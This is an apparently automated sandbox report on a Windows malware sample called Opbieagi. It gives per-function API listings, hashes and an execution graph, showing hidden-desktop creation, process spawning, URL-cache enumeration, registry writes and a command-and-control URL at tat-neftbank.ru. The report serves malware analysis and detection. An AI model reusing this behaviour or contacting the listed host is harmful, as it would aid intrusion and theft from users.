                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            Function 00403840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            Function 00403BBE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 112COMMON
                            Download Yara Rule
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            Function 004017AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            Function 0040109B Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            Function 0040447A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            Function 0040421F Relevance: 6.0, APIs: 4, Instructions: 49registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            Function 0040429C Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            Function 00403743 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            Function 0040185F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            Function 0040682B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2693 403840 printf 2694 403880 2693->2694 2695 403884 printf 2694->2695 2696 40386d printf 2694->2696 2696->2694 2702 4052e0 2703 4052ec strcat strcat 2702->2703 2719 40431f 2703->2719 2706 405360 2707 40537c CreateProcessA 2706->2707 2708 4053ac CloseHandle sprintf 2707->2708 2718 405469 2707->2718 2710 405413 2708->2710 2709 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2711 4054d0 2709->2711 2712 4053e5 FindWindowA 2710->2712 2713 40541d 2710->2713 2712->2713 2714 405402 Sleep 2712->2714 2715 405421 Sleep 2713->2715 2713->2718 2714->2710 2716 405434 Sleep 2715->2716 2717 40543e GetWindowTextA 2715->2717 2716->2717 2717->2718 2718->2709 2720 404341 GetCurrentThreadId GetThreadDesktop 2719->2720 2721 404364 CreateDesktopA 2719->2721 2722 40438e SetThreadDesktop 2720->2722 2723 40435f memset 2720->2723 2721->2722 2721->2723 2722->2723 2723->2706 2723->2707 2826 401581 2827 4015c8 2826->2827 2828 4015a2 rand 2827->2828 2829 4015cc 2827->2829 2828->2827 2724 403562 GetModuleFileNameA 2725 403588 2724->2725 2986 402ba3 2988 402a89 2986->2988 2987 402cd2 2988->2987 2989 402cad GetCurrentProcessId 2988->2989 2990 402b2a GetModuleHandleA GetProcAddress 2988->2990 2989->2988 2990->2988 2726 4077e4 2727 407808 2726->2727 2734 40789e 2726->2734 2728 407820 SetFocus 2727->2728 2729 40782b 2727->2729 2727->2734 2728->2729 2730 407833 SetFocus 2729->2730 2731 40783e 2729->2731 2730->2731 2732 407857 2731->2732 2733 40784c SetFocus 2731->2733 2735 40786a 2732->2735 2736 40785f SetFocus 2732->2736 2733->2732 2739 407910 2734->2739 2740 4078fe CallWindowProcA 2734->2740 2737 407872 SetFocus 2735->2737 2738 40787d 2735->2738 2736->2735 2737->2738 2738->2734 2741 407885 SetFocus 2738->2741 2740->2739 2741->2734 2830 405c09 lstrlenA GetTickCount srand 2863 40509b 2830->2863 2835 405f54 2836 405caf ExpandEnvironmentStringsA 2877 40570c 2836->2877 2839 405ceb strcat strcat 2840 40431f 4 API calls 2839->2840 2841 405d14 memset 2840->2841 2842 405d72 CreateProcessA 2841->2842 2843 405d56 2841->2843 2844 405da2 CloseHandle sprintf 2842->2844 2845 405f24 DeleteFileA TerminateProcess CloseHandle 2842->2845 2843->2842 2846 405e09 2844->2846 2845->2835 2847 405e13 2846->2847 2848 405ddb FindWindowA 2846->2848 2847->2845 2850 405e1b Sleep GetWindowTextA 2847->2850 2848->2847 2849 405df8 Sleep 2848->2849 2849->2846 2851 405e50 2850->2851 2851->2845 2916 405613 2851->2916 2853 405e6b 2853->2845 2854 405e76 CopyFileA 2853->2854 2855 403619 5 API calls 2854->2855 2856 405e9c DeleteFileA lstrlenA strncmp 2855->2856 2857 405ec6 lstrlenA 2856->2857 2858 405eef 2856->2858 2924 403743 CreateFileA 2857->2924 2860 403743 4 API calls 2858->2860 2861 405eea LocalFree 2860->2861 2861->2845 2868 4050ea 2863->2868 2864 4050b6 sprintf 2927 4041f4 2864->2927 2865 4050f8 2867 4041f4 4 API calls 2865->2867 2869 40510e 2867->2869 2868->2864 2868->2865 2930 4041c3 lstrlenA 2869->2930 2872 40429c RegOpenKeyExA 2873 4042e0 RegQueryValueExA 2872->2873 2874 4042dc 2872->2874 2875 404304 RegCloseKey 2873->2875 2876 4042f8 RegCloseKey 2873->2876 2874->2835 2874->2836 2875->2874 2876->2874 2878 4079e4 2877->2878 2879 405719 GetTempPathA 2878->2879 2880 405746 2879->2880 2880->2880 2938 4015ea 2880->2938 2883 405798 strcat 2884 4057ac rand 2883->2884 2885 4057e7 rand 2884->2885 2886 4057be rand sprintf 2884->2886 2887 4057f9 strcat 2885->2887 2888 40580d strcat rand 2885->2888 2886->2885 2887->2888 2889 405839 strcat 2888->2889 2890 40584d rand 2888->2890 2889->2890 2891 405888 sprintf rand 2890->2891 2892 40585f rand sprintf 2890->2892 2893 4058c3 strcat 2891->2893 2894 4058d7 strcat rand 2891->2894 2892->2891 2893->2894 2895 405911 strcat rand 2894->2895 2896 4058fd strcat 2894->2896 2897 405966 strcat rand 2895->2897 2898 40593d rand sprintf 2895->2898 2896->2895 2899 4059a0 strcat rand 2897->2899 2900 40598c strcat 2897->2900 2898->2897 2901 4059d2 strcat 2899->2901 2902 4059e6 strcat rand 2899->2902 2900->2899 2901->2902 2903 405a20 sprintf rand 2902->2903 2904 405a0c strcat 2902->2904 2905 405a70 strcat rand 2903->2905 2906 405a5c strcat 2903->2906 2904->2903 2907 405ab0 rand sprintf rand 2905->2907 2908 405a9c strcat 2905->2908 2906->2905 2909 405af3 strcat 2907->2909 2910 405b07 strcat rand 2907->2910 2908->2907 2909->2910 2911 405b39 strcat 2910->2911 2912 405b4d rand 2910->2912 2911->2912 2913 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2912->2913 2914 405b5f rand sprintf 2912->2914 2915 405c04 2913->2915 2914->2913 2915->2835 2915->2839 2917 4079e4 2916->2917 2918 405620 FindFirstUrlCacheEntryA 2917->2918 2919 405663 _stricmp 2918->2919 2920 405685 2918->2920 2919->2920 2921 4056a7 FindNextUrlCacheEntryA 2919->2921 2920->2853 2921->2920 2922 4056c9 _stricmp 2921->2922 2922->2920 2923 4056fb 2922->2923 2923->2921 2925 403775 2924->2925 2926 403779 SetFilePointer WriteFile CloseHandle 2924->2926 2925->2861 2926->2925 2933 40421f RegCreateKeyExA 2927->2933 2931 40421f 4 API calls 2930->2931 2932 4041ee InterlockedIncrement memset 2931->2932 2932->2872 2934 404262 RegSetValueExA 2933->2934 2935 404219 2933->2935 2936 404288 RegCloseKey 2934->2936 2937 40427c RegCloseKey 2934->2937 2935->2868 2936->2935 2937->2935 2939 401634 2938->2939 2940 401638 strcat sprintf rand 2939->2940 2941 40160e rand 2939->2941 2940->2883 2940->2884 2941->2939 2991 4037aa 2992 4037c8 printf printf 2991->2992 2994 40380d 2992->2994 2995 4037fa printf 2994->2995 2997 403812 printf 2994->2997 2995->2994 2998 4035ab 2999 4079e4 2998->2999 3000 4035b8 vsprintf 2999->3000 3003 4035f9 MessageBoxA 3000->3003 3002 4035ea 3003->3002 2742 40686c lstrlenA 2743 405f5b 9 API calls 2742->2743 2744 40689a 2743->2744 2745 4068a1 WinExec 2744->2745 2746 4068a9 2744->2746 2745->2746 2942 40328f 2943 402efd 2942->2943 2944 402cd7 3 API calls 2943->2944 2945 4033ce 2943->2945 2946 40289a 4 API calls 2943->2946 2947 4030e5 GetModuleHandleA 2943->2947 2948 40314c VirtualQuery 2943->2948 2950 402f98 GlobalMemoryStatus 2943->2950 2951 402f6f IsBadReadPtr 2943->2951 2952 403059 CloseHandle 2943->2952 2944->2943 2946->2943 2947->2943 2948->2943 2949 4031b1 IsBadWritePtr 2948->2949 2949->2943 2950->2943 2951->2943 2952->2943 2953 407892 2954 40789e 2953->2954 2955 407910 2954->2955 2956 4078fe CallWindowProcA 2954->2956 2956->2955 3004 405133 10 API calls 3005 40429c 4 API calls 3004->3005 3006 405264 3005->3006 3007 405278 3006->3007 3008 40526b LocalFree 3006->3008 3010 40509b 6 API calls 3007->3010 3009 4054d0 3008->3009 3011 40527d ExpandEnvironmentStringsA 3010->3011 3030 404532 3011->3030 3014 4052d3 LocalFree 3014->3009 3015 4052ec strcat strcat 3016 40431f 4 API calls 3015->3016 3017 405315 memset 3016->3017 3018 405360 3017->3018 3019 40537c CreateProcessA 3017->3019 3018->3019 3020 4053ac CloseHandle sprintf 3019->3020 3029 405469 3019->3029 3022 405413 3020->3022 3021 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3021->3009 3023 4053e5 FindWindowA 3022->3023 3024 40541d 3022->3024 3023->3024 3025 405402 Sleep 3023->3025 3026 405421 Sleep 3024->3026 3024->3029 3025->3022 3027 405434 Sleep 3026->3027 3028 40543e GetWindowTextA 3026->3028 3027->3028 3028->3029 3029->3021 3031 40453f 3030->3031 3032 403619 5 API calls 3031->3032 3033 404570 3032->3033 3034 404579 3033->3034 3035 404596 lstrlenA LocalAlloc GetTempPathA 3033->3035 3036 404589 LocalFree 3033->3036 3034->3014 3034->3015 3037 404604 3035->3037 3036->3034 3037->3037 3038 4015ea rand 3037->3038 3039 40461d strcat sprintf rand 3038->3039 3040 404655 strcat 3039->3040 3041 404668 rand 3039->3041 3040->3041 3042 40467a rand sprintf 3041->3042 3043 40469d rand 3041->3043 3042->3043 3044 4046bb strcat 3043->3044 3045 4046ce strcat rand 3043->3045 3044->3045 3046 4046f3 strcat 3045->3046 3047 404706 rand 3045->3047 3046->3047 3048 404741 sprintf rand 3047->3048 3049 40471e rand sprintf 3047->3049 3050 404770 strcat 3048->3050 3051 404783 strcat rand 3048->3051 3049->3048 3050->3051 3052 4047a8 strcat 3051->3052 3053 4047bb strcat rand 3051->3053 3052->3053 3054 4047e6 rand sprintf 3053->3054 3055 404809 rand sprintf sprintf rand 3053->3055 3054->3055 3056 404859 rand sprintf 3055->3056 3057 40487c rand 3055->3057 3056->3057 3058 404894 strcat 3057->3058 3059 4048a7 rand 3057->3059 3058->3059 3060 4048b9 strcat 3059->3060 3061 4048cc rand 3059->3061 3060->3061 3062 4048f1 sprintf rand 3061->3062 3063 4048de strcat 3061->3063 3064 404926 strcat 3062->3064 3065 404939 rand 3062->3065 3063->3062 3064->3065 3066 40494b strcat 3065->3066 3067 40495e rand 3065->3067 3066->3067 3068 404976 rand sprintf 3067->3068 3069 404999 3067->3069 3068->3069 3075 4049a3 3069->3075 3096 404b12 3069->3096 3070 404b07 3072 404c87 strcat rand 3070->3072 3071 4043bf 2 API calls 3071->3096 3073 404cac strcat 3072->3073 3074 404cbf rand 3072->3074 3073->3074 